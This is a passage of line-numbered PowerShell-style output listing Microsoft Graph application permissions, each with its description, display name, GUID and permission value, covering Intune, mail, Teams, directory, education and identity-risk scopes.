 840 | Description        : Allows the app to read and write the properties relating to the Microsoft Intune Role-Based Access Control (RBAC) settings, 
 841 |                      without a signed-in user.
 842 | DisplayName        : Read and write Microsoft Intune RBAC settings
 843 | Id                 : e330c4f0-4170-414e-a55a-2f022ec2b57b
 844 | IsEnabled          : True
 845 | Value              : DeviceManagementRBAC.ReadWrite.All
 846 | 
 847 | AllowedMemberTypes : {Application}
 848 | Description        : Allows the app to read and write the properties of devices managed by Microsoft Intune, without a signed-in user. Does not allow 
 849 |                      high impact operations such as remote wipe and password reset on the device’s owner
 850 | DisplayName        : Read and write Microsoft Intune devices
 851 | Id                 : 243333ab-4d21-40cb-a475-36241daa0842
 852 | IsEnabled          : True
 853 | Value              : DeviceManagementManagedDevices.ReadWrite.All
 854 | 
 855 | AllowedMemberTypes : {Application}
 856 | Description        : Allows the app to perform remote high impact actions such as wiping the device or resetting the passcode on devices managed by 
 857 |                      Microsoft Intune, without a signed-in user.
 858 | DisplayName        : Perform user-impacting remote actions on Microsoft Intune devices
 859 | Id                 : 5b07b0dd-2377-4e44-a38d-703f09a0dc3c
 860 | IsEnabled          : True
 861 | Value              : DeviceManagementManagedDevices.PrivilegedOperations.All
 862 | 
 863 | AllowedMemberTypes : {Application}
 864 | Description        : Allows the app to read and write properties of Microsoft Intune-managed device configuration and device compliance policies and 
 865 |                      their assignment to groups, without a signed-in user.
 866 | DisplayName        : Read and write Microsoft Intune device configuration and policies
 867 | Id                 : 9241abd9-d0e6-425a-bd4f-47ba86e767a4
 868 | IsEnabled          : True
 869 | Value              : DeviceManagementConfiguration.ReadWrite.All
 870 | 
 871 | AllowedMemberTypes : {Application}
 872 | Description        : Allows the app to read and write the properties, group assignments and status of apps, app configurations and app protection 
 873 |                      policies managed by Microsoft Intune, without a signed-in user.
 874 | DisplayName        : Read and write Microsoft Intune apps
 875 | Id                 : 78145de6-330d-4800-a6ce-494ff2d33d07
 876 | IsEnabled          : True
 877 | Value              : DeviceManagementApps.ReadWrite.All
 878 | 
 879 | AllowedMemberTypes : {Application}
 880 | Description        : Allows the app to read all organizational contacts without a signed-in user.  These contacts are managed by the organization and 
 881 |                      are different from a user's personal contacts.
 882 | DisplayName        : Read organizational contacts
 883 | Id                 : e1a88a34-94c4-4418-be12-c87b00e26bea
 884 | IsEnabled          : True
 885 | Value              : OrgContact.Read.All
 886 | 
 887 | AllowedMemberTypes : {Application}
 888 | Description        : Allows the app to place outbound calls to a single user and transfer calls to users in your organization’s directory, without a 
 889 |                      signed-in user.
 890 | DisplayName        : Initiate outgoing 1 to 1 calls from the app
 891 | Id                 : 284383ee-7f6e-4e40-a2a8-e85dcb029101
 892 | IsEnabled          : True
 893 | Value              : Calls.Initiate.All
 894 | 
 895 | AllowedMemberTypes : {Application}
 896 | Description        : Allows the app to place outbound calls to multiple users and add participants to meetings in your organization, without a 
 897 |                      signed-in user.
 898 | DisplayName        : Initiate outgoing group calls from the app
 899 | Id                 : 4c277553-8a09-487b-8023-29ee378d8324
 900 | IsEnabled          : True
 901 | Value              : Calls.InitiateGroupCall.All
 902 | 
 903 | AllowedMemberTypes : {Application}
 904 | Description        : Allows the app to join group calls and scheduled meetings in your organization, without a signed-in user. The app will be joined 
 905 |                      with the privileges of a directory user to meetings in your organization.
 906 | DisplayName        : Join group calls and meetings as an app
 907 | Id                 : f6b49018-60ab-4f81-83bd-22caeabfed2d
 908 | IsEnabled          : True
 909 | Value              : Calls.JoinGroupCall.All
 910 | 
 911 | AllowedMemberTypes : {Application}
 912 | Description        : Allows the app to anonymously join group calls and scheduled meetings in your organization, without a signed-in user. The app 
 913 |                      will be joined as a guest to meetings in your organization.
 914 | DisplayName        : Join group calls and meetings as a guest
 915 | Id                 : fd7ccf6b-3d28-418b-9701-cd10f5cd2fd4
 916 | IsEnabled          : True
 917 | Value              : Calls.JoinGroupCallAsGuest.All
 918 | 
 919 | AllowedMemberTypes : {Application}
 920 | Description        : Allows the app to get direct access to media streams in a call, without a signed-in user.
 921 | DisplayName        : Access media streams in a call as an app
 922 | Id                 : a7a681dc-756e-4909-b988-f160edc6655f
 923 | IsEnabled          : True
 924 | Value              : Calls.AccessMedia.All
 925 | 
 926 | AllowedMemberTypes : {Application}
 927 | Description        : Allows the app to read online meeting details in your organization, without a signed-in user.
 928 | DisplayName        : Read online meeting details
 929 | Id                 : c1684f21-1984-47fa-9d61-2dc8c296bb70
 930 | IsEnabled          : True
 931 | Value              : OnlineMeetings.Read.All
 932 | 
 933 | AllowedMemberTypes : {Application}
 934 | Description        : Allows the app to read and create online meetings as an application in your organization.
 935 | DisplayName        : Read and create online meetings
 936 | Id                 : b8bb2037-6e08-44ac-a4ea-4674e010e2a4
 937 | IsEnabled          : True
 938 | Value              : OnlineMeetings.ReadWrite.All
 939 | 
 940 | AllowedMemberTypes : {Application}
 941 | Description        : Allows the app to read or write your organization's user flows, without a signed-in user.
 942 | DisplayName        : Read and write all identity user flows
 943 | Id                 : 65319a09-a2be-469d-8782-f6b07debf789
 944 | IsEnabled          : True
 945 | Value              : IdentityUserFlow.ReadWrite.All
 946 | 
 947 | AllowedMemberTypes : {Application}
 948 | Description        : Allows the app to read your organization's user flows, without a signed-in user.
 949 | DisplayName        : Read all identity user flows
 950 | Id                 : 1b0c317f-dd31-4305-9932-259a8b6e8099
 951 | IsEnabled          : True
 952 | Value              : IdentityUserFlow.Read.All
 953 | 
 954 | AllowedMemberTypes : {Application}
 955 | Description        : Allows the app to create, read, update, and delete events of all calendars without a signed-in user.
 956 | DisplayName        : Read and write calendars in all mailboxes
 957 | Id                 : ef54d2bf-783f-4e0f-bca1-3210c0444d99
 958 | IsEnabled          : True
 959 | Value              : Calendars.ReadWrite
 960 | 
 961 | AllowedMemberTypes : {Application}
 962 | Description        : Allows the app to read events of all calendars without a signed-in user.
 963 | DisplayName        : Read calendars in all mailboxes
 964 | Id                 : 798ee544-9d2d-430c-a058-570e29e34338
 965 | IsEnabled          : True
 966 | Value              : Calendars.Read
 967 | 
 968 | AllowedMemberTypes : {Application}
 969 | Description        : Allows the app to read and write all device properties without a signed in user.  Does not allow device creation, device deletion 
 970 |                      or update of device alternative security identifiers.
 971 | DisplayName        : Read and write devices
 972 | Id                 : 1138cb37-bd11-4084-a2b7-9f71582aeddb
 973 | IsEnabled          : True
 974 | Value              : Device.ReadWrite.All
 975 | 
 976 | AllowedMemberTypes : {Application}
 977 | Description        : Allows the app to read and write data in your organization's directory, such as users, and groups, without a signed-in user.  
 978 |                      Does not allow user or group deletion.
 979 | DisplayName        : Read and write directory data
 980 | Id                 : 19dbc75e-c2e2-444c-a770-ec69d8559fc7
 981 | IsEnabled          : True
 982 | Value              : Directory.ReadWrite.All
 983 | 
 984 | AllowedMemberTypes : {Application}
 985 | Description        : Allows the app to read data in your organization's directory, such as users, groups and apps, without a signed-in user.
 986 | DisplayName        : Read directory data
 987 | Id                 : 7ab1d382-f21e-4acd-a863-ba3e13f7da61
 988 | IsEnabled          : True
 989 | Value              : Directory.Read.All
 990 | 
 991 | AllowedMemberTypes : {Application}
 992 | Description        : Allows the app to create groups, read all group properties and memberships, update group properties and memberships, and delete 
 993 |                      groups. Also allows the app to read and write group calendar and conversations.  All of these operations can be performed by the 
 994 |                      app without a signed-in user.
 995 | DisplayName        : Read and write all groups
 996 | Id                 : 62a82d76-70ea-41e2-9197-370581804d09
 997 | IsEnabled          : True
 998 | Value              : Group.ReadWrite.All
 999 | 
1000 | AllowedMemberTypes : {Application}
1001 | Description        : Allows the app to read group properties and memberships, and read the calendar and conversations for all groups, without a 
1002 |                      signed-in user.
1003 | DisplayName        : Read all groups
1004 | Id                 : 5b567255-7703-4780-807c-7be8301ae99b
1005 | IsEnabled          : True
1006 | Value              : Group.Read.All
1007 | 
1008 | AllowedMemberTypes : {Application}
1009 | Description        : Allows the app to create, read, update, and delete all contacts in all mailboxes without a signed-in user.
1010 | DisplayName        : Read and write contacts in all mailboxes
1011 | Id                 : 6918b873-d17a-4dc1-b314-35f528134491
1012 | IsEnabled          : True
1013 | Value              : Contacts.ReadWrite
1014 | 
1015 | AllowedMemberTypes : {Application}
1016 | Description        : Allows the app to read all contacts in all mailboxes without a signed-in user.
1017 | DisplayName        : Read contacts in all mailboxes
1018 | Id                 : 089fe4d0-434a-44c5-8827-41ba8a0b17f5
1019 | IsEnabled          : True
1020 | Value              : Contacts.Read
1021 | 
1022 | AllowedMemberTypes : {Application}
1023 | Description        : Allows the app to send mail as any user without a signed-in user.
1024 | DisplayName        : Send mail as any user
1025 | Id                 : b633e1c5-b582-4048-a93e-9f11b44c7e96
1026 | IsEnabled          : True
1027 | Value              : Mail.Send
1028 | 
1029 | AllowedMemberTypes : {Application}
1030 | Description        : Allows the app to create, read, update, and delete mail in all mailboxes without a signed-in user. Does not include permission to 
1031 |                      send mail.
1032 | DisplayName        : Read and write mail in all mailboxes
1033 | Id                 : e2a3a72e-5f79-4c64-b1b1-878b674786c9
1034 | IsEnabled          : True
1035 | Value              : Mail.ReadWrite
1036 | 
1037 | AllowedMemberTypes : {Application}
1038 | Description        : Allows the app to read mail in all mailboxes without a signed-in user.
1039 | DisplayName        : Read mail in all mailboxes
1040 | Id                 : 810c84a8-4a9e-49e6-bf7d-12d183f40d01
1041 | IsEnabled          : True
1042 | Value              : Mail.Read
1043 | 
1044 | AllowedMemberTypes : {Application}
1045 | Description        : Allows the app to read user's mailbox settings without a signed-in user. Does not include permission to send mail.
1046 | DisplayName        : Read all user mailbox settings
1047 | Id                 : 40f97065-369a-49f4-947c-6a255697ae91
1048 | IsEnabled          : True
1049 | Value              : MailboxSettings.Read
1050 | 
1051 | AllowedMemberTypes : {Application}
1052 | Description        : Allows the app to read and write all domain properties without a signed in user. Also allows the app to add, verify and remove 
1053 |                      domains.
1054 | DisplayName        : Read and write domains
1055 | Id                 : 7e05723c-0bb0-42da-be95-ae9f08a6e53c
1056 | IsEnabled          : True
1057 | Value              : Domain.ReadWrite.All
1058 | 
1059 | AllowedMemberTypes : {Application}
1060 | Description        : Allows the app to create, read, update, and delete user's mailbox settings without a signed-in user. Does not include permission 
1061 |                      to send mail.
1062 | DisplayName        : Read and write all user mailbox settings
1063 | Id                 : 6931bccd-447a-43d1-b442-00a195474933
1064 | IsEnabled          : True
1065 | Value              : MailboxSettings.ReadWrite
1066 | 
1067 | AllowedMemberTypes : {Application}
1068 | Description        : Allows the app to create, read, update and delete applications and service principals without a signed-in user.  Does not allow 
1069 |                      management of consent grants.
1070 | DisplayName        : Read and write all applications
1071 | Id                 : 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9
1072 | IsEnabled          : True
1073 | Value              : Application.ReadWrite.All
1074 | 
1075 | AllowedMemberTypes : {Application}
1076 | Description        : Allows the app to update Microsoft Teams channel messages by patching a set of Data Loss Prevention (DLP) policy violation 
1077 |                      properties to handle the output of DLP processing.
1078 | DisplayName        : Flag channel messages for violating policy
1079 | Id                 : 4d02b0cc-d90b-441f-8d82-4fb55c34d6bb
1080 | IsEnabled          : True
1081 | Value              : ChannelMessage.UpdatePolicyViolation.All
1082 | 
1083 | AllowedMemberTypes : {Application}
1084 | Description        : Allows the app to read all channel messages in Microsoft Teams
1085 | DisplayName        : Read all channel messages
1086 | Id                 : 7b2449af-6ccd-4f4d-9f78-e550c193f0d1
1087 | IsEnabled          : True
1088 | Value              : ChannelMessage.Read.All
1089 | 
1090 | AllowedMemberTypes : {Application}
1091 | Description        : Allows the app to read all 1-to-1 or group chat messages in Microsoft Teams.
1092 | DisplayName        : Read all chat messages
1093 | Id                 : 6b7d71aa-70aa-4810-a8d9-5d9fb2830017
1094 | IsEnabled          : True
1095 | Value              : Chat.Read.All
1096 | 
1097 | AllowedMemberTypes : {Application}
1098 | Description        : Allows the app to update Microsoft Teams 1-to-1 or group chat messages by patching a set of Data Loss Prevention (DLP) policy 
1099 |                      violation properties to handle the output of DLP processing.
1100 | DisplayName        : Flag chat messages for violating policy
1101 | Id                 : 7e847308-e030-4183-9899-5235d7270f58
1102 | IsEnabled          : True
1103 | Value              : Chat.UpdatePolicyViolation.All
1104 | 
1105 | AllowedMemberTypes : {Application}
1106 | Description        : Allows the app to read any user's scored list of relevant people, without a signed-in user. The list can include local contacts, 
1107 |                      contacts from social networking, your organization's directory, and people from recent communications (such as email and Skype).
1108 | DisplayName        : Read all users' relevant people lists
1109 | Id                 : b528084d-ad10-4598-8b93-929746b4d7d6
1110 | IsEnabled          : True
1111 | Value              : People.Read.All
1112 | 
1113 | AllowedMemberTypes : {Application}
1114 | Description        : Allows an app to read all service usage reports without a signed-in user.  Services that provide usage reports include Office 365 
1115 |                      and Azure Active Directory.
1116 | DisplayName        : Read all usage reports
1117 | Id                 : 230c1aed-a721-4c5d-9cb4-a90514e508ef
1118 | IsEnabled          : True
1119 | Value              : Reports.Read.All
1120 | 
1121 | AllowedMemberTypes : {Application}
1122 | Description        : Allows the app to read access reviews, reviewers, decisions and settings in the organization, without a signed-in user.
1123 | DisplayName        : Read all access reviews
1124 | Id                 : d07a8cc0-3d51-4b77-b3b0-32704d1f69fa
1125 | IsEnabled          : True
1126 | Value              : AccessReview.Read.All
1127 | 
1128 | AllowedMemberTypes : {Application}
1129 | Description        : Allows the app to read, update, delete and perform actions on access reviews, reviewers, decisions and settings in the 
1130 |                      organization, without a signed-in user.
1131 | DisplayName        : Manage all access reviews
1132 | Id                 : ef5f7d5c-338f-44b0-86c3-351f46c8bb5f
1133 | IsEnabled          : True
1134 | Value              : AccessReview.ReadWrite.All
1135 | 
1136 | AllowedMemberTypes : {Application}
1137 | Description        : Allows the app to read programs and program controls in the organization, without a signed-in user.
1138 | DisplayName        : Read all programs
1139 | Id                 : eedb7fdd-7539-4345-a38b-4839e4a84cbd
1140 | IsEnabled          : True
1141 | Value              : ProgramControl.Read.All
1142 | 
1143 | AllowedMemberTypes : {Application}
1144 | Description        : Allows the app to read, update, delete and perform actions on programs and program controls in the organization, without a 
1145 |                      signed-in user.
1146 | DisplayName        : Manage all programs
1147 | Id                 : 60a901ed-09f7-4aa5-a16e-7dd3d6f9de36
1148 | IsEnabled          : True
1149 | Value              : ProgramControl.ReadWrite.All
1150 | 
1151 | AllowedMemberTypes : {Application}
1152 | Description        : Allows the app to export data (e.g. customer content or system-generated logs), associated with any user in your company, when 
1153 |                      the app is used by a privileged user (e.g. a Company Administrator).
1154 | DisplayName        : Export user's data
1155 | Id                 : 405a51b5-8d8d-430b-9842-8be4b0e9f324
1156 | IsEnabled          : True
1157 | Value              : User.Export.All
1158 | 
1159 | AllowedMemberTypes : {Application}
1160 | Description        : Allows the app to create other applications, and fully manage those applications (read, update, update application secrets and 
1161 |                      delete), without a signed-in user. It cannot update any apps that it is not an owner of.
1162 | DisplayName        : Manage apps that this app creates or owns
1163 | Id                 : 18a4783c-866b-4cc7-a460-3d5e5662c884
1164 | IsEnabled          : True
1165 | Value              : Application.ReadWrite.OwnedBy
1166 | 
1167 | AllowedMemberTypes : {Application}
1168 | Description        : Allows the app to read and query your audit log activities, without a signed-in user.
1169 | DisplayName        : Read all audit log data
1170 | Id                 : b0afded3-3588-46d8-8b3d-9842eff778da
1171 | IsEnabled          : True
1172 | Value              : AuditLog.Read.All
1173 | 
1174 | AllowedMemberTypes : {Application}
1175 | Description        : Allows the app to read user profiles without a signed in user.
1176 | DisplayName        : Read all users' full profiles
1177 | Id                 : df021288-bdef-4463-88db-98f22de89214
1178 | IsEnabled          : True
1179 | Value              : User.Read.All
1180 | 
1181 | AllowedMemberTypes : {Application}
1182 | Description        : Allows the app to read and update user profiles without a signed in user.
1183 | DisplayName        : Read and write all users' full profiles
1184 | Id                 : 741f803b-c850-494e-b5df-cde7c675a1ca
1185 | IsEnabled          : True
1186 | Value              : User.ReadWrite.All
1187 | 
1188 | AllowedMemberTypes : {Application}
1189 | Description        : Allows the app to read the identity risky user information for your organization without a signed in user.
1190 | DisplayName        : Read all identity risky user information
1191 | Id                 : dc5007c0-2d7d-4c42-879c-2dab87571379
1192 | IsEnabled          : True
1193 | Value              : IdentityRiskyUser.Read.All
1194 | 
1195 | AllowedMemberTypes : {Application}
1196 | Description        : Manage the state and settings of all Microsoft education apps.
1197 | DisplayName        : Manage education app settings
1198 | Id                 : 9bc431c3-b8bc-4a8d-a219-40f10f92eff6
1199 | IsEnabled          : True
1200 | Value              : EduAdministration.ReadWrite.All
1201 | 
1202 | AllowedMemberTypes : {Application}
1203 | Description        : Read the state and settings of all Microsoft education apps.
1204 | DisplayName        : Read Education app settings
1205 | Id                 : 7c9db06a-ec2d-4e7b-a592-5a1e30992566
1206 | IsEnabled          : True
1207 | Value              : EduAdministration.Read.All
1208 | 
1209 | AllowedMemberTypes : {Application}
1210 | Description        : Allows the app to read and write assignments and their grades for all users.
1211 | DisplayName        : Read and write class assignments with grades
1212 | Id                 : 0d22204b-6cad-4dd0-8362-3e3f2ae699d9
1213 | IsEnabled          : True
1214 | Value              : EduAssignments.ReadWrite.All
1215 | 
1216 | AllowedMemberTypes : {Application}
1217 | Description        : Allows the app to read assignments and their grades for all users.
1218 | DisplayName        : Read class assignments with grades
1219 | Id                 : 4c37e1b6-35a1-43bf-926a-6f30f2cdf585
1220 | IsEnabled          : True
1221 | Value              : EduAssignments.Read.All
1222 | 
1223 | AllowedMemberTypes : {Application}
1224 | Description        : Allows the app to read and write assignments without grades for all users.
1225 | DisplayName        : Read and write class assignments without grades
1226 | Id                 : f431cc63-a2de-48c4-8054-a34bc093af84
1227 | IsEnabled          : True
1228 | Value              : EduAssignments.ReadWriteBasic.All
1229 | 
1230 | AllowedMemberTypes : {Application}
1231 | Description        : Allows the app to read assignments without grades for all users.
1232 | DisplayName        : Read class assignments without grades
1233 | Id                 : 6e0a958b-b7fc-4348-b7c4-a6ab9fd3dd0e
1234 | IsEnabled          : True
1235 | Value              : EduAssignments.ReadBasic.All
1236 | 
1237 | AllowedMemberTypes : {Application}
1238 | Description        : Allows the app to read and write the structure of schools and classes in the organization's roster and education-specific 
1239 |                      information about all users to be read and written.
1240 | DisplayName        : Read and write the organization's roster
1241 | Id                 : d1808e82-ce13-47af-ae0d-f9b254e6d58a
1242 | IsEnabled          : True
1243 | Value              : EduRoster.ReadWrite.All
1244 | 
1245 | AllowedMemberTypes : {Application}
1246 | Description        : Allows the app to read the structure of schools and classes in the organization's roster and education-specific information about 
1247 |                      all users to be read.
1248 | DisplayName        : Read the organization's roster
1249 | Id                 : e0ac9e1b-cb65-4fc5-87c5-1a8bc181f648
1250 | IsEnabled          : True
1251 | Value              : EduRoster.Read.All
1252 | 
1253 | AllowedMemberTypes : {Application}
1254 | Description        : Allows the app to read a limited subset of properties from both the structure of schools and classes in the organization's roster 
1255 |                      and education-specific information about all users. Includes name, status, role, email address and photo.
1256 | DisplayName        : Read a limited subset of the organization's roster
1257 | Id                 : 0d412a8c-a06c-439f-b3ec-8abcf54d2f96
1258 | IsEnabled          : True
1259 | Value              : EduRoster.ReadBasic.All
1260 | 
1261 | AllowedMemberTypes : {Application}
1262 | Description        : Allows the app to read the identity risk event information for your organization without a signed in user.
1263 | DisplayName        : Read all identity risk event information
1264 | Id                 : 6e472fd1-ad78-48da-a0f0-97ab2c6b769e
1265 | IsEnabled          : True
1266 | Value              : IdentityRiskEvent.Read.All
1267 | 
1268 | AllowedMemberTypes : {Application}
1269 | Description        : Allows the app to read all files in all site collections without a signed in user.
1270 | DisplayName        : Read files in all site collections
1271 | Id                 : 01d4889c-1287-42c6-ac1f-5d1e02578ef6
1272 | IsEnabled          : True
1273 | Value              : Files.Read.All
1274 | 
1275 | AllowedMemberTypes : {Application}
1276 | Description        : Allows the app to read and update identity risky user information for your organization without a signed-in user. Update 
1277 |                      operations include dismissing risky users.
1278 | DisplayName        : Read and write all risky user information
1279 | Id                 : 656f6061-f9fe-4807-9708-6a2e0934df76
1280 | IsEnabled          : True
1281 | Value              : IdentityRiskyUser.ReadWrite.All
1282 | 
1283 | AllowedMemberTypes : {Application}
1284 | Description        : Allows the app to read and update identity risk detection information for your organization without a signed-in user. Update 
1285 |                      operations include confirming risk event detections.
1286 | DisplayName        : Read and write all risk detection information
1287 | Id                 : db06fb33-1953-4b7b-a2ac-f1e2c854f7ae
1288 | IsEnabled          : True
1289 | Value              : IdentityRiskEvent.ReadWrite.All
1290 | 
1291 | AllowedMemberTypes : {Application}
1292 | Description        : Allows an app to read and write all chat messages in Microsoft Teams, without a signed-in user.
1293 | DisplayName        : Read and write all chat messages
1294 | Id                 : 294ce7c9-31ba-490a-ad7d-97a7d075e4ed
1295 | IsEnabled          : True
1296 | Value              : Chat.ReadWrite.All
1297 | 
1298 | AllowedMemberTypes : {Application}
1299 | Description        : Allows the app to read your organization’s security events without a signed-in user.
1300 | DisplayName        : Read your organization’s security events
1301 | Id                 : bf394140-e372-4bf9-a898-299cfc7564e5
1302 | IsEnabled          : True
1303 | Value              : SecurityEvents.Read.All
1304 | 
1305 | AllowedMemberTypes : {Application}
1306 | Description        : Allows the app to read your organization’s security events without a signed-in user. Also allows the app to update editable 
1307 |                      properties in security events.
1308 | DisplayName        : Read and update your organization’s security events
1309 | Id                 : d903a879-88e0-4c09-b0c9-82f6a1333f84
1310 | IsEnabled          : True
1311 | Value              : SecurityEvents.ReadWrite.All
1312 | 
1313 | AllowedMemberTypes : {Application}
1314 | Description        : Allows the app to read documents and list items in all site collections without a signed in user.
1315 | DisplayName        : Read items in all site collections (preview)
1316 | Id                 : 332a536c-c7ef-4017-ab91-336970924f0d
1317 | IsEnabled          : True
1318 | Value              : Sites.Read.All
1319 | 
1320 | AllowedMemberTypes : {Application}
1321 | Description        : Allows the app to read security actions, without a signed-in user.
1322 | DisplayName        : Read your organization's security actions
1323 | Id                 : 5e0edab9-c148-49d0-b423-ac253e121825
1324 | IsEnabled          : True
1325 | Value              : SecurityActions.Read.All
1326 | 
1327 | AllowedMemberTypes : {Application}
1328 | Description        : Allows the app to read or update security actions, without a signed-in user.
1329 | DisplayName        : Read and update your organization's security actions
1330 | Id                 : f2bf083f-0179-402a-bedb-b2784de8a49b
1331 | IsEnabled          : True
1332 | Value              : SecurityActions.ReadWrite.All
1333 | 
1334 | AllowedMemberTypes : {Application}
1335 | Description        : Allows the app to create threat indicators, and fully manage those threat indicators (read, update and delete), without a 
1336 |                      signed-in user. It cannot update any threat indicators it does not own.
1337 | DisplayName        : Manage threat indicators this app creates or owns
1338 | Id                 : 21792b6c-c986-4ffc-85de-df9da54b52fa
1339 | IsEnabled          : True
1340 | Value              : ThreatIndicators.ReadWrite.OwnedBy
1341 | 
1342 | AllowedMemberTypes : {Application}
1343 | Description        : Allows the app to read, create, update and delete all files in all site collections without a signed in user. 
1344 | DisplayName        : Read and write files in all site collections
1345 | Id                 : 75359482-378d-4052-8f01-80520e7db3cd
1346 | IsEnabled          : True
1347 | Value              : Files.ReadWrite.All
1348 | 
1349 | AllowedMemberTypes : {Application}
1350 | Description        : Allows the app to invite guest users to the organization, without a signed-in user.
1351 | DisplayName        : Invite guest users to the organization
1352 | Id                 : 09850681-111b-4a89-9bed-3f2cae46d706
1353 | IsEnabled          : True
1354 | Value              : User.Invite.All
1355 | 
1356 | AllowedMemberTypes : {Application}
1357 | Description        : Allows the app to read all the OneNote notebooks in your organization, without a signed-in user.
1358 | DisplayName        : Read all OneNote notebooks
1359 | Id                 : 3aeca27b-ee3a-4c2b-8ded-80376e2134a4
1360 | IsEnabled          : True
1361 | Value              : Notes.Read.All
1362 | 
1363 | AllowedMemberTypes : {Application}
1364 | Description        : Allows an app to read published sensitivity labels and label policy settings for the entire organization or a specific user, 
1365 |                      without a signed in user.
1366 | DisplayName        : Read all published labels and label policies for an organization.
1367 | Id                 : 19da66cb-0fb0-4390-b071-ebc76a349482
1368 | IsEnabled          : True
1369 | Value              : InformationProtectionPolicy.Read.All
1370 | 
1371 | AllowedMemberTypes : {Application}
1372 | Description        : Allows the app to read administrative units and administrative unit membership without a signed-in user.
1373 | DisplayName        : Read all administrative units
1374 | Id                 : 134fd756-38ce-4afd-ba33-e9623dbe66c2
1375 | IsEnabled          : True
1376 | Value              : AdministrativeUnit.Read.All
1377 | 
1378 | AllowedMemberTypes : {Application}
1379 | Description        : Allows the app to create, read, update, and delete administrative units and manage administrative unit membership without a 
1380 |                      signed-in user.
1381 | DisplayName        : Read and write all administrative units
1382 | Id                 : 5eb59dd3-1da2-4329-8733-9dabdc435916
1383 | IsEnabled          : True
1384 | Value              : AdministrativeUnit.ReadWrite.All
1385 | 
1386 | AllowedMemberTypes : {Application}
1387 | Description        : Allows the app to read your organization’s identity (authentication) providers’ properties without a signed in user.
1388 | DisplayName        : Read identity providers
1389 | Id                 : e321f0bb-e7f7-481e-bb28-e3b0b32d4bd0
1390 | IsEnabled          : True
1391 | Value              : IdentityProvider.Read.All
1392 | 
1393 | AllowedMemberTypes : {Application}
1394 | Description        : Allows the app to read and write your organization’s identity (authentication) providers’ properties without a signed in user.
1395 | DisplayName        : Read and write identity providers
1396 | Id                 : 90db2b9a-d928-4d33-a4dd-8442ae3d41e4
1397 | IsEnabled          : True
1398 | Value              : IdentityProvider.ReadWrite.All
1399 | 
1400 | AllowedMemberTypes : {Application}
1401 | Description        : Allows the app to read all your organization's policies without a signed in user.
1402 | DisplayName        : Read your organization's policies
1403 | Id                 : 246dd0d5-5bd0-4def-940b-0421030a5b68
1404 | IsEnabled          : True
1405 | Value              : Policy.Read.All
1406 | 
1407 | AllowedMemberTypes : {Application}
1408 | Description        : Allows the app to read and write your organization's trust framework policies without a signed in user.
1409 | DisplayName        : Read and write your organization's trust framework policies
1410 | Id                 : 79a677f7-b79d-40d0-a36a-3e6f8688dd7a
1411 | IsEnabled          : True
1412 | Value              : Policy.ReadWrite.TrustFramework
1413 | 
1414 | AllowedMemberTypes : {Application}
1415 | Description        : Allows the app to read trust framework key set properties without a signed-in user.
1416 | DisplayName        : Read trust framework key sets
1417 | Id                 : fff194f1-7dce-4428-8301-1badb5518201
1418 | IsEnabled          : True
1419 | Value              : TrustFrameworkKeySet.Read.All
1420 | 
1421 | AllowedMemberTypes : {Application}
1422 | Description        : Allows the app to read and write trust framework key set properties without a signed-in user.
1423 | DisplayName        : Read and write trust framework key sets
1424 | Id                 : 4a771c9a-1cf2-4609-b88e-3d3e02d539cd
1425 | IsEnabled          : True
1426 | Value              : TrustFrameworkKeySet.ReadWrite.All
1427 | 
1428 | AllowedMemberTypes : {Application}
1429 | Description        : Allows the app to create, view, update and delete on-premises published resources, on-premises agents and agent groups, as part 
1430 |                      of a hybrid identity configuration, without a signed in user.
1431 | DisplayName        : Manage on-premises published resources
1432 | Id                 : 0b57845e-aa49-4e6f-8109-ce654fffa618
1433 | IsEnabled          : True
1434 | Value              : OnPremisesPublishingProfiles.ReadWrite.All
1435 | 
1436 | AllowedMemberTypes : {Application}
1437 | Description        : Allows the app to read Microsoft Intune service properties including device enrollment and third party service connection 
1438 |                      configuration, without a signed-in user.
1439 | DisplayName        : Read Microsoft Intune configuration
1440 | Id                 : 06a5fe6d-c49d-46a7-b082-56b1b14103c7
1441 | IsEnabled          : True
1442 | Value              : DeviceManagementServiceConfig.Read.All
1443 | 
1444 | AllowedMemberTypes : {Application}
1445 | Description        : Allows the app to read the properties relating to the Microsoft Intune Role-Based Access Control (RBAC) settings, without a 
1446 |                      signed-in user.
1447 | DisplayName        : Read Microsoft Intune RBAC settings
1448 | Id                 : 58ca0d9a-1575-47e1-a3cb-007ef2e4583b
1449 | IsEnabled          : True
1450 | Value              : DeviceManagementRBAC.Read.All
1451 | 
1452 | AllowedMemberTypes : {Application}
1453 | Description        : Allows the app to read the properties of devices managed by Microsoft Intune, without a signed-in user.
1454 | DisplayName        : Read Microsoft Intune devices
1455 | Id                 : 2f51be20-0bb4-4fed-bf7b-db946066c75e
1456 | IsEnabled          : True
1457 | Value              : DeviceManagementManagedDevices.Read.All
1458 | 
1459 | AllowedMemberTypes : {Application}
1460 | Description        : Allows the app to read the properties, group assignments and status of apps, app configurations and app protection policies 
1461 |                      managed by Microsoft Intune, without a signed-in user.
1462 | DisplayName        : Read Microsoft Intune apps
1463 | Id                 : 7a6ee1e7-141e-4cec-ae74-d9db155731ff
1464 | IsEnabled          : True
1465 | Value              : DeviceManagementApps.Read.All
1466 | 
1467 | AllowedMemberTypes : {Application}
1468 | Description        : Allows the app to read properties of Microsoft Intune-managed device configuration and device compliance policies and their 
1469 |                      assignment to groups, without a signed-in user.
1470 | DisplayName        : Read Microsoft Intune device configuration and policies
1471 | Id                 : dc377aa6-52d8-4e23-b271-2a7ae04cedf3
1472 | IsEnabled          : True
1473 | Value              : DeviceManagementConfiguration.Read.All
1474 | 
1475 | AllowedMemberTypes : {Application}
1476 | Description        : Allows the app to read, update, delete and perform actions on access reviews, reviewers, decisions and settings in the 
1477 |                      organization for group and app memberships, without a signed-in user.
1478 | DisplayName        : Manage access reviews for group and app memberships
1479 | Id                 : 18228521-a591-40f1-b215-5fad4488c117
1480 | IsEnabled          : True
1481 | Value              : AccessReview.ReadWrite.Membership
1482 | 
1483 | AllowedMemberTypes : {Application}
1484 | Description        : Allow the app to read or write items in all external datasets that the app is authorized to access
1485 | DisplayName        : Read and write items in external datasets
1486 | Id                 : 38c3d6ee-69ee-422f-b954-e17819665354
1487 | IsEnabled          : True
1488 | Value              : ExternalItem.ReadWrite.All
1489 | 
1490 | AllowedMemberTypes : {Application}
1491 | Description        : Allows the app to read the memberships of hidden groups and administrative units without a signed-in user.
1492 | DisplayName        : Read all hidden memberships
1493 | Id                 : 658aa5d8-239f-45c4-aa12-864f4fc7e490
1494 | IsEnabled          : True
1495 | Value              : Member.Read.Hidden
1496 | 
1497 | AllowedMemberTypes : {Application}
